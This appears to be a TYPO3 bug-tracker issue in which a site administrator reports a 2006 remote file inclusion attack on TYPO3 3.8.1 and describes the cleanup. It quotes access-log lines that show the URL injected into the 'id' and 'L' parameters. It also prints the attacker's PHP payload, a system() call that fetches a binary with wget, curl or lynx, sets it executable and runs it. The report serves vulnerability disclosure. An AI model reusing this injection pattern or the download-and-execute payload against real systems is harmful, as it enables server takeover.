TYPO3 Core

On a 3.8.1 installation a find in the Apache access_log a Entri like:

213.202.240.173 - - [31/Aug/2006:22:09:48 +0200] "GET /index.php?id=http://abuser.republika.pl/test?&&L=5 HTTP/1.1" 200 25709 "-" "-"
213.202.240.173 - - [31/Aug/2006:22:09:49 +0200] "GET /index.php?id=ip_observer&L=http://abuser.republika.pl/test?& HTTP/1.1" 200 39571 "-" "-"

After this request all further requests to my typo3 have in the L variable:

p549caaa9.dip0.t-ipconnect.de - - [02/Sep/2006:00:08:57 +0200] "GET /index.php?id=15&L=http%3A%2F%2Fabuser.republika.pl%2Ftest%3F HTTP/1.1" 200 3494 "http://www.leicht.info/index.php?id=13&L=http%3A%2F%2Fabuser.republika.pl%2Ftest%3F" "Mozilla/5.0 (\
Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3"

The abuser.republika.pl/test is returning:

echo 'm4k4bra - mamy cie';
system('cd /var/tmp;wget http://abuser.republika.pl/kt2; if [ ! -e ./kt2 ]; then curl http://abuser.republika.pl/kt2 > kt2;fi;if [ ! -e ./kt2 ];then lynx -dump http://abuser.republika.pl/kt2 >kt2; fi; chmod 777 kt2; ./kt2&');
?>

After restart Apache - empty /tmp and block the republika.pl in the .htacces file, i have no attacks again.

But i´m not the only one have this attack.

My Typo3 skills are not deep enough to investigate this correct. Thats why i report.

Christian

(issue imported from #M4193)